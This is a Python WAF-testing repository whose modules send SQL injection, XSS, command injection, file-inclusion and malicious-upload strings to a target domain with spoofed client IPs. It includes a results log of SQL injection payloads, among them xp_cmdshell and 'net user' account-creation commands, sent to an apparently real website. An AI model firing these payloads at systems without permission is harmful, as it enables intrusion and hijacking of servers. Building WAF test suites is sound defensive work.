├── .gitattributes
├── .gitignore
├── exploit.py
├── lib
    ├── __init__.py
    ├── logging.py
    └── request_util.py
├── modules
    ├── COMMANDI_TEST.py
    ├── DOWNLOAD_TEST.py
    ├── LFI_TEST.py
    ├── SPIDER_TEST.py
    ├── SQLI_TEST.py
    ├── UPLOAD_CONTENT_TEST.py
    ├── UPLOAD_EXT_TEST.py
    ├── XSS_TEST.py
    └── __init__.py
├── readme.txt
├── result
    └── sqli_result.txt
└── usecase
    ├── commandi.usecase
    ├── download.usecase
    ├── lfi.usecase
    ├── spider.usecase
    ├── sqli.usecase
    ├── upload_content
        ├── a.php
        ├── b.asp
        ├── c.aspx
        └── webshell
        │   ├── 404.php
        │   └── phpspy.php
    └── upload_ext.usecase


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | 
 7 | # Standard to msysgit
 8 | *.doc	 diff=astextplain
 9 | *.DOC	 diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot  diff=astextplain
13 | *.DOT  diff=astextplain
14 | *.pdf  diff=astextplain
15 | *.PDF	 diff=astextplain
16 | *.rtf	 diff=astextplain
17 | *.RTF	 diff=astextplain
18 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Windows image file caches
 2 | Thumbs.db
 3 | ehthumbs.db
 4 | 
 5 | # Folder config file
 6 | Desktop.ini
 7 | 
 8 | # Recycle Bin used on file shares
 9 | $RECYCLE.BIN/
10 | 
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 | 
17 | # Windows shortcuts
18 | *.lnk
19 | 
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 | 
24 | # OSX
25 | # =========================
26 | 
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 | 
31 | # Thumbnails
32 | ._*
33 | 
34 | # Files that might appear on external disk
35 | .Spotlight-V100
36 | .Trashes
37 | 
38 | # Directories potentially created on remote AFP share
39 | .AppleDB
40 | .AppleDesktop
41 | Network Trash Folder
42 | Temporary Items
43 | .apdisk
44 | 


--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # coding:utf-8
  3 | 
  4 | import getopt,sys
  5 | from modules.SQLI_TEST import *
  6 | from modules.XSS_TEST import *
  7 | from modules.COMMANDI_TEST import *
  8 | from modules.SPIDER_TEST import *
  9 | from modules.LFI_TEST import *
 10 | from modules.DOWNLOAD_TEST import *
 11 | from modules.UPLOAD_EXT_TEST import *
 12 | from modules.UPLOAD_CONTENT_TEST import *
 13 | 
 14 | def printSyntax():
 15 | 	print '''
 16 | #=====================================
 17 | #-t type : test type (eg:sqli,xss,commandi,lfi,upload_ext,upload_content,download,spider)
 18 | #-m method: test method (eg:get,post)
 19 | #-d domain : test domain (eg:http://www.xxx.com/)
 20 | #-u usecase : test usecase 
 21 | #Usage:
 22 | 	./exploit.py -t <type> -m <method> -d <domain> [-u <usecase>]
 23 | 	./exploit.py -t sqli -m get -d http://www.xxoo.com -u usecase/sqli.usecase
 24 | #=====================================
 25 | '''
 26 | 
 27 | if __name__=='__main__':
 28 | 	if len(sys.argv) < 7:
 29 | 		printSyntax()
 30 | 		sys.exit(1)
 31 | 	else:
 32 | 		try:
 33 | 			opts,args = getopt.getopt(sys.argv[1:],"t:m:d:u:")
 34 | 		except:
 35 | 			printSyntax()
 36 | 			sys.exit(1)
 37 | 
 38 | 	type = None
 39 | 	method = None
 40 | 	domain = None
 41 | 	usecase = None
 42 | 	
 43 | 	for opt,arg in opts:
 44 | 		if opt == '-t':
 45 | 			type = arg
 46 | 		elif opt == '-m':
 47 | 			method = arg
 48 | 		elif opt == '-d':
 49 | 			domain = arg
 50 | 		elif opt == '-u':
 51 | 			usecase = arg
 52 | 		else:
 53 | 			print "Unknown options!"
 54 | 			printSyntax()
 55 | 			sys.exit(1)
 56 | 
 57 | 	if method != "get" and method != "post":
 58 | 		print "Unknown method!"
 59 | 		printSyntax()
 60 | 		sys.exit(1)
 61 | 
 62 | 	if type == "sqli":
 63 | 		if usecase == None:
 64 | 			usecase = "usecase/sqli.usecase"
 65 | 		SQLI_TEST(domain,method,usecase)
 66 | 	elif type == "xss":
 67 | 		if usecase == None:
 68 | 			usecase = "usecase/xss.usecase"
 69 | 		XSS_TEST(domain,method,usecase)
 70 | 	elif type == "lfi":
 71 | 		if usecase == None:
 72 | 			usecase = "usecase/lfi.usecase"
 73 | 		LFI_TEST(domain,method,usecase)
 74 | 	elif type == "commandi":
 75 | 		if usecase == None:
 76 | 			usecase = "usecase/commandi.usecase"
 77 | 		COMMANDI_TEST(domain,method,usecase)
 78 | 	elif type =="download":
 79 | 		if usecase == None:
 80 | 			usecase = "usecase/download.usecase"
 81 | 		if method == "post":
 82 | 			print "download method must be GET!"
 83 | 			printSyntax()
 84 | 			sys.exit(1)
 85 | 		DOWNLOAD_TEST(domain,method,usecase)
 86 | 	elif type == "upload_ext":
 87 | 		if usecase == None:
 88 | 			usecase = "usecase/upload_ext.usecase"
 89 | 		if method == "get":
 90 | 			print "upload method must be POST!"
 91 | 			printSyntax()
 92 | 			sys.exit(1)
 93 | 		UPLOAD_EXT_TEST(domain,method,usecase)
 94 | 	elif type == "upload_content":
 95 | 		if usecase == None:
 96 |                         usecase = "usecase/upload_content"
 97 |                 if method == "get":
 98 |                         print "upload method must be POST!"
 99 |                         printSyntax()
100 |                         sys.exit(1)
101 |                 UPLOAD_CONTENT_TEST(domain,method,usecase)
102 | 	elif type == "spider":
103 | 		if usecase == None:
104 | 			usecase = "usecase/spider.usecase"
105 | 		SPIDER_TEST(domain,method,usecase)
106 | 	else:
107 | 		print "Unknown type!"
108 | 


--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hongxs/WAF-Tester2/b2535eb2dd94ae9a093cd9131cd2c510e9b5f30d/lib/__init__.py


--------------------------------------------------------------------------------
/lib/logging.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # coding:utf-8
 3 | from lib.request_util import *
 4 | import time
 5 | 
 6 | class logging:
 7 | 	def __init__(self,logfile):
 8 | 		self.logfile = logfile
 9 | 		self.f = open(self.logfile,"w")
10 | 		self.f.write("+++++++++++[The result]+++++++++++\n\n")
11 | 
12 | 	def writelog(self,message):
13 | 		try:
14 | 			self.f.write(message)
15 | 		except IOError:
16 | 			pass
17 | 
18 | 	def close(self):
19 | 		self.f.close()
20 | 


--------------------------------------------------------------------------------
/lib/request_util.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python 
 2 | # coding:utf-8
 3 | 
 4 | import urllib,urllib2,socket
 5 | import random,types
 6 | socket.setdefaulttimeout(10)
 7 | 
 8 | def send_req_get(url,params=None,headers=None):
 9 |         if params:
10 |                 params_str = urllib.urlencode(params)
11 |                 url = "%s?%s" % (url,params_str)
12 | 	#	print url
13 |                 req = urllib2.Request(url,headers=headers)
14 |         else:
15 |                 req = urllib2.Request(url,headers=headers)
16 |         try:
17 |                 response = urllib2.urlopen(req)
18 |                 res = response.getcode()
19 |         except urllib2.HTTPError,e:
20 |                 res = e.code
21 | 		pass
22 | 		
23 |         return url,res
24 | 
25 | def send_req_post(url,params=None,headers=None):
26 | 	if params:
27 | 		if type(params) is types.DictType:
28 | 			params = urllib.urlencode(params)
29 | 		req = urllib2.Request(url,data=params,headers=headers)
30 | 	else:
31 | 		req = urllib2.Request(url,headers=headers)
32 | 	try:
33 | 		f = urllib2.urlopen(req)
34 | 		res = f.getcode()
35 | 	except urllib2.HTTPError,e:
36 | 		res = e.code
37 | 		print e
38 | 		pass
39 | 	except Exception,e:
40 | 		print e
41 | 		res = "[ERROR]"
42 | 		pass
43 | 
44 | 	return url,res
45 | 
46 | def randomIP():
47 | 	clientip = ""
48 | 	for i in range(3):
49 | 		temp = random.randint(0,255)
50 | 		clientip += str(temp) + "."
51 | 	clientip = clientip + str(random.randint(0,255))
52 | 	return clientip
53 | 
54 | def check_usecase(uri,method,params,req_headers,host):
55 | 	url = host + uri
56 | 	clientip = randomIP()
57 | 	if req_headers == None:
58 | 		req_headers={"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6",
59 | 			"X-Forwarded-For": clientip}
60 | 	else:
61 | 		req_headers['X-Forward-For'] = clientip
62 | #	print clientip
63 | 	if method == "get":
64 | 		res = send_req_get(url,params,req_headers)
65 | 	elif method == "post":
66 | 		res = send_req_post(url,params,req_headers)
67 | 	else:
68 | 		res = 503
69 | 	return res
70 | 


--------------------------------------------------------------------------------
/modules/COMMANDI_TEST.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # coding:utf-8
 3 | from lib.request_util import *
 4 | from lib.logging import *
 5 | import time
 6 | 
 7 | def check_commandi_usecase(info,domain,method,i,logging_file):
 8 | 	print "----------------"
 9 | #	print i,":",info
10 | 	res = check_usecase("/default.aspx",method,{"id":info},None,domain)
11 | 	print res[0]
12 |         logging_file.writelog("-------------\n")
13 |         logging_file.writelog(res[0]+"\n" )
14 |         if res[1] == 400:
15 |                 print i,":",res[1],"   usecase:",info
16 |                 logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+ info +"\n" )
17 |         else:
18 |                 print '\033[1;31;40m'
19 |                 print i,":",res[1],"   usecase:",info
20 |                 print '\033[0m'
21 |                 logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+info+"\n" )
22 | 
23 | def COMMANDI_TEST(domain,method,usecase):
24 | 	commandi_file = open(usecase)
25 | 	file_content_lines = commandi_file.readlines()
26 | 	commandi_file.close()
27 | 	i = 0
28 | 	logging_file = logging("result/commandi_result.txt")
29 | 	for line in file_content_lines:
30 | 		info = line.strip()
31 | 		i+=1
32 | 		if info != "":
33 | 			check_commandi_usecase(info,domain,method,i,logging_file)
34 | 			#time.sleep(5)
35 | 	logging_file.close()
36 | 


--------------------------------------------------------------------------------
/modules/DOWNLOAD_TEST.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # coding:utf-8
 3 | from lib.request_util import *
 4 | from lib.logging import *
 5 | import time
 6 | 
 7 | def check_download_usecase(info,domain,method,i,logging_file):
 8 |         print "----------------"
 9 | #       print i,":",info
10 | 	info = "/"+info
11 |         res = check_usecase(info,method,None,None,domain)
12 | 	print res[0]
13 |         logging_file.writelog("-------------\n")
14 |         logging_file.writelog(res[0]+"\n" )
15 |         if res[1] == 400:
16 |                 print i,":",res[1],"   usecase:",info
17 |                 logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+ info +"\n" )
18 |         else:
19 |                 print '\033[1;31;40m'
20 |                 print i,":",res[1],"   usecase:",info
21 |                 print '\033[0m'
22 |                 logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+info+"\n" )
23 | 
24 | def DOWNLOAD_TEST(domain,method,usecase):
25 |         download_file = open(usecase)
26 |         file_content_lines = download_file.readlines()
27 |         download_file.close()
28 |         i = 0
29 | 	logging_file = logging("result/download_result.txt")
30 |         for line in file_content_lines:
31 |                 info = line.strip()
32 |                 i+=1
33 |                 if info != "":
34 |                         check_download_usecase(info,domain,method,i,logging_file)
35 |                 #        time.sleep(5)
36 | 	logging_file.close()
37 | 


--------------------------------------------------------------------------------
/modules/LFI_TEST.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # coding:utf-8
 3 | from lib.request_util import *
 4 | from lib.logging import *
 5 | import time
 6 | 
 7 | def check_lfi_usecase(info,domain,method,i,logging_file):
 8 | 	print "----------------"
 9 | #	print i,":",info
10 | 	res = check_usecase("/default.aspx",method,{"id":info},None,domain)
11 | 	print res[0]
12 |         logging_file.writelog("-------------\n")
13 |         logging_file.writelog(res[0]+"\n" )
14 |         if res[1] == 400:
15 |                 print i,":",res[1],"   usecase:",info
16 |                 logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+ info +"\n" )
17 |         else:
18 |                 print '\033[1;31;40m'
19 |                 print i,":",res[1],"   usecase:",info
20 |                 print '\033[0m'
21 |                 logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+info+"\n" )
22 | 
23 | def LFI_TEST(domain,method,usecase):
24 | 	lfi_file = open(usecase)
25 | 	file_content_lines = lfi_file.readlines()
26 | 	lfi_file.close()
27 | 	i = 0
28 | 	logging_file = logging("result/lfi_result.txt")
29 | 	for line in file_content_lines:
30 | 		info = line.strip()
31 | 		i+=1
32 | 		if info != "":
33 | 			check_lfi_usecase(info,domain,method,i,logging_file)
34 | 			#time.sleep(5)
35 | 	logging_file.close()
36 | 


--------------------------------------------------------------------------------
/modules/SPIDER_TEST.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # coding:utf-8
 3 | from lib.request_util import *
 4 | from lib.logging import *
 5 | import time
 6 | 
 7 | def check_spider_usecase(info,domain,method,i,logging_file):
 8 | 	print "----------------"
 9 | #	print i,":",info
10 | 	res = check_usecase("/default.aspx",method,None,{"User-Agent":info},domain)
11 | 	print res[0]
12 | 	logging_file.writelog("-------------\n")
13 |         logging_file.writelog(res[0]+"\n" )
14 |         if res[1] == 400:
15 |                 print i,":",res[1],"   usecase:",info
16 |                 logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+ info +"\n" )
17 |         else:
18 |                 print '\033[1;31;40m'
19 |                 print i,":",res[1],"   usecase:",info
20 |                 print '\033[0m'
21 |                 logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+info+"\n" )	
22 | 
23 | def SPIDER_TEST(domain,method,usecase):
24 | 	spider_file = open(usecase)
25 | 	file_content_lines = spider_file.readlines()
26 | 	spider_file.close()
27 | 	i = 0
28 | 	logging_file = logging("result/spider_result.txt")
29 | 	for line in file_content_lines:
30 | 		info = line.strip()
31 | 		i+=1
32 | 		if info != "":
33 | 			check_spider_usecase(info,domain,method,i,logging_file)
34 | 		#	time.sleep(5)
35 | 	logging_file.close()
36 | 


--------------------------------------------------------------------------------
/modules/SQLI_TEST.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # coding:utf-8
 3 | from lib.request_util import *
 4 | from lib.logging import *
 5 | import time
 6 | 
 7 | def check_sqli_usecase(info,domain,method,i,logging_file):
 8 | 	print "----------------"
 9 | #	print i,":",info
10 | 	res = check_usecase("/default.aspx",method,{"id":info},None,domain)
11 | 	print res[0]
12 | 	logging_file.writelog("-------------\n")
13 | 	logging_file.writelog(res[0]+"\n" )
14 | 	if res[1] == 400:
15 |                 print i,":",res[1],"   usecase:",info
16 | 		logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+ info +"\n" )
17 |         else:
18 |                 print '\033[1;31;40m'
19 |                 print i,":",res[1],"   usecase:",info
20 |                 print '\033[0m'
21 | 		logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+info+"\n" )
22 | 
23 | def SQLI_TEST(domain,method,usecase):
24 | 	sqli_file = open(usecase)
25 | 	file_content_lines = sqli_file.readlines()
26 | 	sqli_file.close()
27 | 	i = 0
28 | 	method = method
29 | 	logging_file = logging("result/sqli_result.txt")
30 | 	for line in file_content_lines:
31 | 		info = line.strip()
32 | 		i+=1
33 | 		if info != "":
34 | 			check_sqli_usecase(info,domain,method,i,logging_file)
35 | 			#time.sleep(5)
36 | 	logging_file.close()
37 | 


--------------------------------------------------------------------------------
/modules/UPLOAD_CONTENT_TEST.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # coding:utf-8
 3 | from lib.request_util import *
 4 | from lib.logging import *
 5 | import time,os,sys
 6 | 
 7 | i = 0
 8 | def generate_data(boundary,filepath):
 9 | 	data = []
10 |         data.append('--%s' % boundary)
11 |         
12 |         data.append('Content-Disposition: form-data; name="%s"\r\n' % 'username')
13 |         data.append('jack')
14 |         data.append('--%s' % boundary)
15 |         
16 |         data.append('Content-Disposition: form-data; name="%s"\r\n' % 'mobile')
17 |         data.append('13800138000')
18 |         data.append('--%s' % boundary)
19 | 
20 | 	try:        
21 |         	fr=open(filepath,'rb')
22 | 	except Exception ,e:
23 | 		print "Open file ERROR!"
24 | 		print e
25 |        	data.append('Content-Disposition: form-data; name="profile"; filename="%s"' % 'test.jpg')
26 |         data.append('Content-Type: %s\r\n' % 'image/jpeg')
27 | 	data.append('testtesttest!')
28 |         data.append(fr.read())
29 |         fr.close()
30 |         data.append('--%s--\r\n' % boundary)
31 | 
32 | 	return data
33 | 	
34 | 
35 | def check_upload_usecase(filepath,domain,method,i,logging_file):
36 | 	print "----------------"
37 | #	print i,":",info
38 | 	boundary = '----------%s' % hex(int(time.time() * 1000))
39 | 	data = generate_data(boundary,filepath)
40 | 	upload_data = '\r\n'.join(data)
41 | #	print upload_data
42 | 	req_headers = {"Content-Type": "multipart/form-data; boundary=%s" % boundary,
43 | 			"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"}
44 | 	try:
45 | 		res = check_usecase("/search123.php",method,upload_data,req_headers,domain)
46 | #		print "res",":",res
47 | 	except Exception,e:
48 | 		print "ERROR!"
49 | 		print e
50 | 		pass
51 | 	print res[0]
52 |         logging_file.writelog("-------------\n")
53 |         logging_file.writelog(res[0]+"\n" )
54 |         if res[1] == 400:
55 |                 print i,":",res[1],"   usecase:",filepath
56 |                 logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+ filepath +"\n" )
57 |         else:
58 |                 print '\033[1;31;40m'
59 |                 print i,":",res[1],"   usecase:",filepath
60 |                 print '\033[0m'
61 |                 logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+ filepath +"\n" )
62 | 
63 | def UPLOAD_CONTENT_TEST(domain,method,usecase):
64 | #	upload_file = open(usecase)
65 | #	file_content_lines = upload_file.readlines()
66 | #	upload_file.close()
67 | 	global i
68 | 	oldpath = usecase
69 | 	filelist = os.listdir(oldpath)
70 | 	logging_file = logging("result/upload_content_result.txt")
71 | 	for name in filelist:
72 | 		newpath = os.path.join(oldpath,name)
73 | 		if os.path.isdir(newpath):
74 | 			usecase = newpath
75 | 			UPLOAD_CONTENT_TEST(domain,method,usecase)
76 | 			usecase = oldpath
77 | 		else:
78 | 			i = i + 1
79 | 			check_upload_usecase(newpath,domain,method,i,logging_file)
80 | 			#time.sleep(5)
81 | 	logging_file.close()
82 | 


--------------------------------------------------------------------------------
/modules/UPLOAD_EXT_TEST.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # coding:utf-8
 3 | from lib.request_util import *
 4 | from lib.logging import *
 5 | import time
 6 | 
 7 | def generate_data(boundary,filename):
 8 | 	data = []
 9 |         data.append('--%s' % boundary)
10 |         
11 |         data.append('Content-Disposition: form-data; name="%s"\r\n' % 'username')
12 |         data.append('jack')
13 |         data.append('--%s' % boundary)
14 |         
15 |         data.append('Content-Disposition: form-data; name="%s"\r\n' % 'mobile')
16 |         data.append('13800138000')
17 |         data.append('--%s' % boundary)
18 |         
19 | #       fr=open(r'/var/qr/b.png','rb')
20 |         data.append('Content-Disposition: form-data; name="profile"; filename="%s"' % filename)
21 |         data.append('Content-Type: %s\r\n' % 'image/png')
22 | 	data.append('testtesttest!')
23 | #       data.append(fr.read())
24 | #       fr.close()
25 |         data.append('--%s--\r\n' % boundary)
26 | 
27 | 	return data
28 | 	
29 | 
30 | def check_upload_usecase(info,domain,method,i,logging_file):
31 | 	print "----------------"
32 | #	print i,":",info
33 | 	boundary = '----------%s' % hex(int(time.time() * 1000))
34 | 	data = generate_data(boundary,info)
35 | 	upload_data = '\r\n'.join(data)
36 | 	#print upload_data
37 | 	req_headers = {"Content-Type": "multipart/form-data; boundary=%s" % boundary,
38 | 			"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"}
39 | 	res = check_usecase("/search.php",method,upload_data,req_headers,domain)
40 | 	print res[0]
41 |         logging_file.writelog("-------------\n")
42 |         logging_file.writelog(res[0]+"\n" )
43 |         if res[1] == 400:
44 |                 print i,":",res[1],"   usecase:",info
45 |                 logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+ info +"\n" )
46 |         else:
47 |                 print '\033[1;31;40m'
48 |                 print i,":",res[1],"   usecase:",info
49 |                 print '\033[0m'
50 |                 logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+info+"\n" )
51 | 
52 | def UPLOAD_EXT_TEST(domain,method,usecase):
53 | 	upload_file = open(usecase)
54 | 	file_content_lines = upload_file.readlines()
55 | 	upload_file.close()
56 | 	i = 0
57 | 	logging_file = logging("result/upload_ext_result.txt")
58 | 	for line in file_content_lines:
59 | 		info = line.strip()
60 | 		i+=1
61 | 		if info != "":
62 | 			check_upload_usecase(info,domain,method,i,logging_file)
63 | 			#time.sleep(5)
64 | 	logging_file.close()
65 | 


--------------------------------------------------------------------------------
/modules/XSS_TEST.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # coding:utf-8
 3 | from lib.request_util import *
 4 | from lib.logging import *
 5 | import time
 6 | 
 7 | def check_xss_usecase(info,domain,method,i,logging_file):
 8 |         print "----------------"
 9 | #       print i,":",info
10 |         res = check_usecase("/default.aspx",method,{"id":info},None,domain)
11 | #        print i,":",res,"   usecase:",info
12 | 	print res[0]
13 |         logging_file.writelog("-------------\n")
14 |         logging_file.writelog(res[0]+"\n" )
15 |         if res[1] == 400:
16 |                 print i,":",res[1],"   usecase:",info
17 |                 logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+ info +"\n" )
18 |         else:
19 |                 print '\033[1;31;40m'
20 |                 print i,":",res[1],"   usecase:",info
21 |                 print '\033[0m'
22 |                 logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +"   usecase:"+info+"\n" )
23 | 
24 | def XSS_TEST(domain,method,usecase):
25 |         xss_file = open(usecase)
26 |         file_content_lines = xss_file.readlines()
27 |         xss_file.close()
28 |         i = 0
29 | 	logging_file = logging("result/xss_result.txt")
30 |         for line in file_content_lines:
31 |                 info = line.strip()
32 |                 i+=1
33 |                 if info != "":
34 |                         check_xss_usecase(info,domain,method,i,logging_file)
35 | 			#time.sleep(5)
36 | 	logging_file.close()
37 | 


--------------------------------------------------------------------------------
/modules/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hongxs/WAF-Tester2/b2535eb2dd94ae9a093cd9131cd2c510e9b5f30d/modules/__init__.py


--------------------------------------------------------------------------------
/readme.txt:
--------------------------------------------------------------------------------
 1 | WAF-Tester
 2 | 
 3 | ========
 4 | 
 5 | 
 6 | WAF 测试工具 --- 用例测试
 7 | 
 8 | 
 9 | 直接运行./exploit.py，运行结果返回403为被WAF拦截，否则为漏报！结果自动保存在result目录下！
10 | 
11 | #=====================================
12 | 
13 | #-t type : test type (eg:sqli,xss,commandi,lfi,upload_ext,upload_content,download,spider)
14 | 
15 | #-m method: test method (eg:get,post)
16 | 
17 | #-d domain : test domain (eg:http://www.xxx.com/)
18 | 
19 | #-u usecase : test usecase 
20 | 
21 | #Usage:
22 | 	
23 | ./exploit.py -t <type> -m <method> -d <domain> [-u <usecase>]
24 | 	
25 | ./exploit.py -t sqli -m get -d http://www.xxoo.com -u usecase/sqli.usecase
26 | 
27 | #=====================================
28 | 
29 | 
30 | 如果没有指定 -u [用例路径]，就采用默认的用例。如自己指定需要测试的用例，就会采用指定的用例。
31 | 
32 | 
33 | 
34 | 类型说明：
35 | sqli		检测SQL注入			
36 | xss		检测跨站脚本攻击		
37 | commandi	检测命令注入攻击
38 | lfi		检测本地文件包含/目录遍历攻击
39 | download	检测非法文件下载
40 | spider		检测恶意爬虫
41 | upload_ext	检测上传文件的后缀名
42 | upload_content	检测上传文件的内容	---默认用例：usecase/upload_content，其中用例以文件为单位，放入文件夹可以递归
43 | 
44 | 
45 | 每发个请求，睡眠5秒！
46 | 由于用例是经验整理的，可能有的欠妥！


--------------------------------------------------------------------------------
/result/sqli_result.txt:
--------------------------------------------------------------------------------
  1 | +++++++++++[The result]+++++++++++
  2 | 
  3 | -------------
  4 | http://www.zoosnet.net/default.aspx
  5 | [!!] 1 : 200   usecase:1 and 1=1
  6 | -------------
  7 | http://www.zoosnet.net/default.aspx
  8 | [OK] 2 : 400   usecase:1 or 'ab'='ab
  9 | -------------
 10 | http://www.zoosnet.net/default.aspx
 11 | [!!] 3 : 200   usecase:1 and ord(mid(version(),1,1))>51/*
 12 | -------------
 13 | http://www.zoosnet.net/default.aspx
 14 | [!!] 4 : 200   usecase:1 order by 10--
 15 | -------------
 16 | http://www.zoosnet.net/default.aspx
 17 | [OK] 5 : 400   usecase:1 ;select BENCHMARK(100000,SHA1('true')), false);--
 18 | -------------
 19 | http://www.zoosnet.net/default.aspx
 20 | [!!] 6 : 200   usecase:1 having 1=1
 21 | -------------
 22 | http://www.zoosnet.net/default.aspx
 23 | [!!] 7 : 200   usecase:1 GROUP BY colume_got having 1=1
 24 | -------------
 25 | http://www.zoosnet.net/default.aspx
 26 | [!!] 8 : 200   usecase:1 ;create table cmd(a text)
 27 | -------------
 28 | http://www.zoosnet.net/default.aspx
 29 | [!!] 9 : 200   usecase:1 "UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%28admin%29%29
 30 | -------------
 31 | http://www.zoosnet.net/default.aspx
 32 | [!!] 10 : 200   usecase:1 =-9%0Aunion%0Aselect 1,2,3,4"
 33 | -------------
 34 | http://www.zoosnet.net/default.aspx
 35 | [OK] 11 : 400   usecase:1 null union all select 1,user(),3,4,5/*
 36 | -------------
 37 | http://www.zoosnet.net/default.aspx
 38 | [OK] 12 : 400   usecase:1 ;insert into user(username,password) values('xxxx',' xxxx'),('dddd','dddd')/* ');
 39 | -------------
 40 | http://www.zoosnet.net/default.aspx
 41 | [!!] 13 : 200   usecase:1
 42 | -------------
 43 | http://www.zoosnet.net/default.aspx
 44 | [!!] 14 : 200   usecase:1 and 1=(Select IS_MEMBER('db_owner'))
 45 | -------------
 46 | http://www.zoosnet.net/default.aspx
 47 | [OK] 15 : 400   usecase:1 And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
 48 | -------------
 49 | http://www.zoosnet.net/default.aspx
 50 | [!!] 16 : 200   usecase:1 and 1= (Select HAS_DBACCESS('master'))
 51 | -------------
 52 | http://www.zoosnet.net/default.aspx
 53 | [OK] 17 : 400   usecase:1 And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
 54 | -------------
 55 | http://www.zoosnet.net/default.aspx
 56 | [!!] 18 : 200   usecase:1 and char(124)%2Buser%2Bchar(124)=0
 57 | -------------
 58 | http://www.zoosnet.net/default.aspx
 59 | [!!] 19 : 200   usecase:1 and user>0
 60 | -------------
 61 | http://www.zoosnet.net/default.aspx
 62 | [!!] 20 : 200   usecase:1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
 63 | -------------
 64 | http://www.zoosnet.net/default.aspx
 65 | [!!] 21 : 200   usecase:1 And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
 66 | -------------
 67 | http://www.zoosnet.net/default.aspx
 68 | [OK] 22 : 400   usecase:1 and exists (select * from sysobjects);--
 69 | -------------
 70 | http://www.zoosnet.net/default.aspx
 71 | [OK] 23 : 400   usecase:1 ;declare @d int;--
 72 | -------------
 73 | http://www.zoosnet.net/default.aspx
 74 | [OK] 24 : 400   usecase:1 ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
 75 | -------------
 76 | http://www.zoosnet.net/default.aspx
 77 | [OK] 25 : 400   usecase:1 select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
 78 | -------------
 79 | http://www.zoosnet.net/default.aspx
 80 | [!!] 26 : 200   usecase:1 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
 81 | -------------
 82 | http://www.zoosnet.net/default.aspx
 83 | [!!] 27 : 200   usecase:1 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select  shell
 84 | -------------
 85 | http://www.zoosnet.net/default.aspx
 86 | [!!] 28 : 200   usecase:1 ("cmd.exe /c net user admin admin1234 /add")')
 87 | -------------
 88 | http://www.zoosnet.net/default.aspx
 89 | [OK] 29 : 400   usecase:1 ";DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:
 90 | -------------
 91 | http://www.zoosnet.net/default.aspx
 92 | [!!] 30 : 200   usecase:1 \WINNT\system32\cmd.exe /c net user paf pafpaf /add';--"
 93 | -------------
 94 | http://www.zoosnet.net/default.aspx
 95 | [!!] 31 : 200   usecase:1 EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
 96 | -------------
 97 | http://www.zoosnet.net/default.aspx
